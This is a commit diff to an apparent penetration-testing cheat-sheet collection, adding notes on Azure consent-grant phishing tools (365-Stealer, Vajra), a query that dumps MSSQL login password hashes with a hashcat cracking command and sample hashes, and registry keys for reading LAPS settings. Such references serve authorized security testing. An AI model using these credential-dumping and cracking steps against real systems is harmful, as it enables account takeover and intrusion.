Vajra + MSSQL hashes

Methodology and Resources/Cloud - Azure Pentest.md

@@ -13,6 +13,10 @@
     * [Enumeration methodology](#enumeration-methodology)
 * [Phishing with Evilginx2](#phishing-with-evilginx2)
 * [Illicit Consent Grant](#illicit-consent-grant)
+    * [Register Application](#register-application)
+    * [Configure Application](#configure-application)
+    * [Setup 365-Stealer (Deprecated)](#setup-365-stealer-deprecated)
+    * [Setup Vajra](#setup-vajra)
 * [Device Code Phish](#device-code-phish)
 * [Token from Managed Identity](#token-from-managed-identity)
     * [Azure API via Powershell](#azure-api-via-powershell)
@@ -396,7 +400,7 @@ Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMS
     * User.ReadBasic.All
     * User.Read
 
-### Setup 365-Stealer
+### Setup 365-Stealer (Deprecated)
 
 :warning: Default port for 365-Stealer phishing is 443
 
@@ -425,6 +429,10 @@ Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMS
     - `--refresh-token XXX --client-id YYY --client-secret ZZZ`: use a refresh token
 - Find the Phishing URL: go to `https://<IP/Domain>:<Port>` and click on **Read More** button or in the console.
 
+### Setup Vajra
+
+> Vajra is a UI-based tool with multiple techniques for attacking and enumerating in the target's Azure environment. It features an intuitive web-based user interface built with the Python Flask module for a better user experience. The primary focus of this tool is to have different attacking techniques all at one place with web UI interfaces. - https://github.com/TROUBLE-1/Vajra
+
 **Mitigation**: Enable `Do not allow user consent` for applications in the "Consent and permissions menu".
 
 

Methodology and Resources/MSSQL Server - Cheatsheet.md

@@ -54,6 +54,7 @@
 	* [Find SQL Server Logins Which can be Impersonated for the Current Database](#find-sql-server-logins-which-can-be-impersonated-for-the-current-database)
 	* [Exploiting Impersonation](#exploiting-impersonation)
 	* [Exploiting Nested Impersonation](#exploiting-nested-impersonation)
+	* [MSSQL Accounts and Hashes](#mssql-accounts-and-hashes)
 * [References](#references)
 
 ## Identify Instances and Databases
@@ -537,6 +538,21 @@ SELECT ORIGINAL_LOGIN()
 SELECT SYSTEM_USER
 ```
 
+### MSSQL Accounts and Hashes
+
+```sql
+SELECT name, password_hash FROM sys.sql_logins
+```
+
+Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force`
+
+```ps1
+131	MSSQL (2000)	0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578
+132	MSSQL (2005)	0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe
+1731	MSSQL (2012, 2014)	0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375
+```
+
+
 ## References
 
 * [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3)

Methodology and Resources/Windows - Privilege Escalation.md

@@ -14,6 +14,7 @@
     * [Default Writeable Folders](#default-writeable-folders)
 * [EoP - Looting for passwords](#eop---looting-for-passwords)
     * [SAM and SYSTEM files](#sam-and-system-files)
+    * [LAPS Settings](#laps-settings)
     * [HiveNightmare](#hivenightmare)
     * [Search for file contents](#search-for-file-contents)
     * [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
@@ -394,6 +395,15 @@ samdump2 SYSTEM SAM -o sam.txt
 
 Either crack it with `john -format=NT /root/sam.txt` or use Pass-The-Hash.
 
+### LAPS Settings
+
+Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry.
+
+* LAPS Enabled: AdmPwdEnabled
+* LAPS Admin Account Name: AdminAccountName
+* LAPS Password Complexity: PasswordComplexity
+* LAPS Password Length: PasswordLength
+* LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled
 
 ### HiveNightmare